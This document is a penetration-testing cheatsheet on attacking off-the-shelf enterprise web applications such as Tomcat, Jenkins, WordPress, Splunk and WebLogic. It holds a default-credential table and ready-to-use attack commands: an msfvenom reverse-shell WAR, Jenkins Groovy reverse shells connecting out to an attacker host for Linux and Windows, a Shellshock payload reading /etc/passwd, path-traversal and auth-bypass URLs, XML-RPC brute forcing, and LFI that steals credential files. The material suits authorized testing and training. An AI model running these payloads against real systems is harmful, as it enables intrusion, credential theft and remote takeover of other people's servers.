π‘οΈ Methodology Checklist
- Web port scan across scope:
nmap -p 80,443,8000,8080,8180,8443,8500,8888,10000 -sV --open - Screenshot every web service (EyeWitness / Aquatone) β triage logins, vendor UIs, dashboards/consoles
- Fingerprint each app + version:
whatweb -a3, 404/error pages,/about,/version, login-page source - Test default credentials on every panel before reaching for exploits
- Map version β
searchsploit [APP] [VER]β NVD β PoC - Hunt built-in execute/upload features (Jenkins Script Console, Zabbix System.run, Tomcat WAR, Axis2 AAR, osTicket attachments)
- LFI any app to steal config/creds (
tomcat-users.xml,settings.php,password.properties) - Check
.giton web root; mine wikis (Confluence/DokuWiki) for passwords, keys, configs
π― Operational Context
Use when: A specific product, CMS, or appliance is identified (vs. a bespoke custom web app) β exploit its known default credentials, config-file disclosure, and version-specific CVEs.
Think Dumber First: Fingerprint β version β searchsploit β PoC. Always try default creds (admin/admin, admin/changeme, vendor defaults) before exploits β vendor docs list them. Look for legitimate βuploadβ or βrun commandβ features before hunting memory-corruption bugs.
Skip when: Target is a custom web app with no identifiable product β use Master_Web_Commands (vulnerability-class attacks: SQLi, XSS, LFI, upload, etc.) instead.
β‘ Tactical Cheatsheet
Default Credentials & Panels
| Application | Port(s) | Path / Panel | Default Creds | Primary Attack / CVE |
|---|---|---|---|---|
| WordPress | 80/443 | /wp-login.php | admin/admin, admin/password | Plugin/theme RCE; XML-RPC brute |
| Joomla | 80/443 | /administrator/ | admin/admin | Template shell; CVE-2019-10945 traversal |
| Drupal | 80/443 | /user/login | admin/admin | Drupalgeddon2 (CVE-2018-7600); PHP-filter RCE |
| Tomcat | 8080/8180/8443, AJP 8009 | /manager/html | tomcat/tomcat, admin/admin, tomcat/s3cret | WAR deploy RCE; Ghostcat (CVE-2020-1938) |
| Jenkins | 8080/8000, agent 5000 | /script | admin/admin, admin/[INSTANCE_ID] | Groovy Script Console RCE |
| Splunk | 8000 (UI), 8089 (REST) | / | admin/changeme, root/5iveL!fe | Malicious app (.spl) upload β RCE |
| PRTG | 80/443/8080 | /index.htm | prtgadmin/prtgadmin, PrtgAdm1n | CVE-2018-9276 authenticated cmd injection |
| ColdFusion | 8500 | /CFIDE/administrator/ | β (hash leak via traversal) | CVE-2010-2861 traversal; CVE-2009-2265 (FCKeditor) RCE |
| GitLab | 80/443 | /explore, /users/sign_up | β | CVE-2021-22205 ExifTool RCE (CE < 13.10.2) |
| osTicket | 80/443 | /scp/ | β | Attachment β RCE; CVE-2020-24881 |
| Axis2 | 8080 | /axis2/axis2-admin/ | admin/axis2 | .aar service upload β RCE |
| WebSphere | β | /WebSphere/console/ | system/manager | Admin console β WAR deploy |
| Zabbix | 80/443 | /zabbix/ | Admin/zabbix | API / System.run β RCE |
| Nagios | 80/443 | /nagios/ | nagiosadmin/PASSW0RD | Version-specific RCE / plugin abuse |
| WebLogic | 7001 | /console | weblogic/welcome1 | Java deserialization (CVE-2020-14882/14883) |
| vCenter | 443, 5480 (VAMI) | /ui, :5480 | administrator@vsphere.local | OVA upload, SSRF, RCE (CVE-2021-21985/22005) |
Discovery & Fingerprinting
| Command | Tactical Outcome |
|---|---|
printf "%s\t%s\n" "[IP]" "app.[DOMAIN] dev.[DOMAIN] blog.[DOMAIN]" | sudo tee -a /etc/hosts | Add vhosts to local resolver before scanning |
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-ports -iL scope.txt | Web port discovery across scope (feeds EyeWitness) |
eyewitness --web -x scans/web-ports.xml -d eyewitness_output | Visual screenshot report from Nmap XML |
cat scans/web-ports.xml | aquatone -nmap -out aquatone_output | Alternative screenshotter with visual clustering |
whatweb -a3 [URL] | Aggressive app fingerprinting for niche CMS/frameworks |
ffuf -w [WORDLIST] -u [URL]/FUZZ -mc 200,401 | Find hidden admin portals and config files |
searchsploit [APP_NAME] [VERSION] | Find CVEs for the identified application version |
CMS β WordPress / Joomla / Drupal
| Command | Tactical Outcome |
|---|---|
curl -s http://[TARGET_IP]/ | grep -E 'themes|plugins' | WP β discover active themes/plugins from page source |
wpscan --url http://[TARGET_IP] --enumerate --api-token [TOKEN] | Full WP enumeration (plugins, themes, users, vulns) |
wpscan --url http://[TARGET_IP] --password-attack xmlrpc -t 20 -U [USER] -P rockyou.txt | WP brute via XML-RPC (bypasses login lockout) |
curl -s http://[TARGET_IP]/administrator/manifests/files/joomla.xml | xmllint --format - | Joomla version (gold standard) |
droopescan scan drupal -u http://[TARGET_IP] | Drupal automated enumeration |
python3 drupalgeddon2.py http://[TARGET_IP]/ | Drupalgeddon2 (CVE-2018-7600) pre-auth RCE |
App Servers β Tomcat / Jenkins
| Command | Tactical Outcome |
|---|---|
nmap -sV -p 8009,8080,8180,8443 [TARGET_IP] | Tomcat ports (AJP 8009, HTTP 8080/8180, HTTPS 8443) |
curl -s http://[TARGET_IP]:[PORT]/[LFI]?file=/usr/local/tomcat/conf/tomcat-users.xml | LFI to steal Tomcat credentials (plaintext) |
msfvenom -p java/jsp_shell_reverse_tcp LHOST=[LHOST] LPORT=[LPORT] -f war > shell.war | Generate malicious WAR for Manager deploy |
python2.7 tomcat-ajp.lfi.py [TARGET_IP] -p 8009 -f WEB-INF/web.xml | Ghostcat (CVE-2020-1938) LFI via AJP 8009 |
curl -i http://jenkins.[DOMAIN]:[PORT]/script | Access Jenkins Script Console (check if unauth) |
Jenkins Groovy reverse shell β Linux (paste into Script Console):
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/[LHOST]/[LPORT];cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()Jenkins Groovy reverse shell β Windows (controller on Windows; /dev/tcp wonβt work):
String host="[LHOST]";
int port=[LPORT];
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
while(pi.available()>0)so.write(pi.read());
while(pe.available()>0)so.write(pe.read());
while(si.available()>0)po.write(si.read());
so.flush();po.flush();
Thread.sleep(50);
try {p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();Monitoring & CGI β Splunk / PRTG / Shellshock
| Command | Tactical Outcome |
|---|---|
nmap -sV -p 8000,8089 [TARGET_IP] | Splunk ports: 8000 (Web UI), 8089 (REST API) |
curl -k https://[TARGET_IP]:8089/services/server/info | Unauthenticated Splunk version via REST API |
curl -s http://[TARGET_IP]:[PORT]/index.htm -A "Mozilla/5.0" | grep version | PRTG version check |
gobuster dir -u http://[TARGET_IP]/cgi-bin/ -w small.txt -x cgi,sh | Find CGI scripts for Shellshock |
curl -H "User-Agent: () { :; }; echo; echo; /bin/cat /etc/passwd" http://[TARGET_IP]/cgi-bin/[SCRIPT].cgi | Shellshock (CVE-2014-6271) info leak |
Notable Enterprise Apps β ColdFusion / Axis2 / WebLogic / vCenter
| Command | Tactical Outcome |
|---|---|
nmap -p- -sV -sC -Pn [TARGET_IP] --open | Full scan β ColdFusion default port 8500 is not in top 1000 |
curl -s http://[TARGET_IP]:8500/CFIDE/administrator/settings/mappings.cfm?locale=../../../../../../../../etc/passwd | ColdFusion CVE-2010-2861 traversal PoC |
curl -s http://[TARGET_IP]/axis2/axis2-admin/ | Axis2 admin panel check (default admin:axis2) |
curl "http://[TARGET_IP]:7001/console/css/%252E%252E%252F%252E%252E%252Fconsole.portal" | WebLogic CVE-2020-14882 auth bypass |
curl -sk https://[TARGET_IP]/sdk | grep -i version | vCenter version identification |
π¬ Deep Dive & Workflow
Application Discovery Workflow
# Step 1: Compile scope (IPs, FQDNs, vhosts)
cat scope.txt
# Step 2: Web port scan (common ports only β don't waste time on all 65k)
sudo nmap -p 80,443,8000,8080,8180,8888,10000 --open -oA scans/web-initial -iL scope.txt
# Step 3: Visual recon β triage
eyewitness --web -x scans/web-initial.xml -d eyewitness_out
# β 401 Unauthorized + "Default Page" = weak-cred opportunity
# β Titles "Dashboard"/"Admin"/"Console" = high value
# β Java stack indicators (Tomcat header, WEB-INF dirs)
# Step 4: Deep scan the interesting targets
sudo nmap -sC -sV -p- -oA scans/deepdive [TARGET_IP]Golden Chain for Unknown / Niche Apps
1. Fingerprint β version β searchsploit
2. Check default credentials (admin:admin, admin:password, [app]:password, vendor defaults)
3. Look for file-upload functionality (even "legitimate" ones)
4. Look for built-in "execute command" features (Zabbix System.run, Jenkins Script Console)
5. Check for .git directories on the web root
Scanner blind spots:
Nessus "no criticals" β check Informational for Nexus, vCenter, JBoss
Manual browsing reveals "support desk", "wiki", "monitoring" portals
osTicket "Attached Files" β RCE (never assume small apps are safe)
π οΈ Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| Application version not visible | No version in headers/response | Check 404 error page, login-page source, and /about or /version endpoints |
| Default creds list incomplete | Generic list | Search [APP_NAME] default credentials on vendor documentation pages |
searchsploit version match too strict | Exact version required | Search broader: searchsploit [APP_NAME], then filter by version range manually |
| Known exploit requires specific config | PoC assumptions wrong | Read PoC source; identify prerequisites (auth required, module enabled, etc.) |
| App fingerprinted incorrectly | Wappalyzer/whatweb misidentification | Confirm manually: HTTP headers, HTML source, cookie names, error messages |
| ColdFusion not found in scan | Default port 8500 outside top 1000 | Run -p- full scan on interesting hosts |
π Reporting Trigger
Finding Title: Common Enterprise Application Vulnerable to Known Exploit / Default Credentials Impact: Identified enterprise application matches a known public exploit or ships with unchanged default credentials, enabling rapid exploitation without vulnerability research β reducing attacker time-to-compromise to minutes using freely available tools, often with direct RCE on the application server. Root Cause: Common enterprise application not updated to address publicly disclosed vulnerabilities; default credentials not changed during deployment; no asset management or vulnerability scanning tracking common application versions. Recommendation: Change all default credentials on deployment. Implement vulnerability scanning that covers common enterprise applications. Establish patch SLAs for critical CVEs. Restrict admin interfaces to a management network and enforce MFA. Remove or isolate vulnerable applications that cannot be immediately patched.